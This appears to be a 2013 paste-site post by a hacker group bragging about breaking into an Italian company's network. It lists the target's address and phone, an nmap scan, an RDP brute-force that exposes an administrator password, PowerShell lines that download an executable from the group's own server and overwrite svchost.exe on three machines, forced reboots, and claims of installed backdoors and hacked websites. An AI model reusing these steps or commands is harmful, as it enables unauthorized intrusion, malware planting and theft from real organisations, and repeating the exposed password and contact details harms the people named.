1.   _______    _____  _      _______                  
  2.  |__   __|  |  __ \| |    |__   __|                  
  3.     | |_   _| |__) | | __    | | ___  __ _ _ __ ___  
  4.     | | | | |  _  /| |/ /    | |/ _ \/ _` | '_ ` _ \
  5.     | | |_| | | \ \|   <     | |  __/ (_| | | | | | |
  6.     |_|\__,_|_|  \_\_|\_\    |_|\___|\__,_|_| |_| |_|
  7.                                                      
  8.      Website: turkhackarmy.org  
  9.  
  10. New target: nuovacosmo.dlinkddns.com   
  11.                                                                                                  
  12. --- PING 2.112.52.162 (2.112.52.162) 56(84) bytes of data. ---
  13. 64 bytes from 2.112.52.162: icmp_req=1 ttl=49 time=6.23 ms
  14. 64 bytes from 2.112.52.162: icmp_req=2 ttl=49 time=6.44 ms
  15. 64 bytes from 2.112.52.162: icmp_req=3 ttl=49 time=6.29 ms
  16. 64 bytes from 2.112.52.162: icmp_req=4 ttl=49 time=6.58 ms
  17.  
  18. ./SWhois 2.112.52.162
  19. route:          2.112.0.0/15
  20. descr:          INTERBUSINESS
  21. id:                     AS3269
  22. origin:                 ibs-resid.milano26.mil.seabone.net
  23. name:           Nuova Cosmo S.r.l.
  24. organization:   Nuova Cosmo S.r.l.
  25. address:                Via Giuseppe di Vittorio, 17, Inzago Milano
  26. telephone:              +00390295310298
  27.  
  28. ./nmap -F -T5 -Pn -sS 2.112.52.162
  29. Host is up (0.016s latency).
  30. PORT STATE SERVICE
  31. 21/tcp open ftp
  32. 3389/tcp open RDP (Remote Desktop Microsoft)
  33.  
  34. Nmap done: 1 IP address (1 host up) scanned in 9.17 seconds
  35.  
  36. WOAH nice!
  37.  
  38. ./rdp_bruteforce 2.112.52.162 administrator passwlist.txt
  39. [+]Starting!
  40. ...................................................Found! (5043 sec)
  41. [!]Administrator@2.112.52.162 PWD='inzago2010' !
  42. [-]Finish.
  43.  
  44. ./rdp_client Administrator:inzago201@2.112.52.162
  45. Connecting..
  46. Connected.
  47.  
  48. WTF? too easy :/
  49. There's a lot of pc with no-login shared directory..
  50.  
  51. Network>
  52.  
  53. DAVIDE \DOCUMENTI
  54. ELENA-PC \UTENTI \DOCUMENTI-ELE \DOWNLOADS \SCANSIONI
  55. SERVER2 \BANCHE \DOCUMENTI \C (DRIVE)
  56. SERVER \BACKUP \UTENTI
  57. ASSISTENZA \C (DRIVE) \D (DRIVE) \E (DRIVE)
  58. PIA-PC \       
  59. DIREZIONE \CONDIVISA
  60. COMMERCIALE \DRIVE \DOCUMENTI
  61. OFFICINA \
  62. USER-PC \
  63. SEGRETERIA \C (DRIVE)
  64.  
  65. PS C:\> Invoke-WebRequest http:\\netshare.turkhackarmy.org\elon\svchost_variant.exe -OutFile \\ASSISTENZA\WINDOWS\SYSTEM32\SVCHOST.EXE
  66. PS C:\> Invoke-WebRequest http:\\netshare.turkhackarmy.org\elon\svchost_variant.exe -OutFile \\SERVER2\WINDOWS\SYSTEM32\SVCHOST.EXE
  67. PS C:\> Invoke-WebRequest http:\\netshare.turkhackarmy.org\elon\svchost_variant.exe -OutFile \\SEGRETERIA\WINDOWS\SYSTEM32\SVCHOST.EXE
  68. PS C:\> shutdown -R -M \\ASSISTENZA -t 0
  69. PS C:\> shutdown -R -M \\SERVER2 -t 0
  70. PS C:\> shutdown -R -M \\SEGRETERIA -t 0
  71.  
  72. Worked, backdoor installed.
  73. G0T R00T !
  74.  
  75. Files and infos gained:
  76.  
  123.  
  124. There's a lot of password..
  125. Hacked www.nuovacosmo.it
  126. Hacked www.workservices.it
  127. Hacked www.studiomartesana.com
  128.  
  129. [-]Attack finished.

Posted by Anonymous at 30 Aug 2013, 08:10:28 Etc/UTC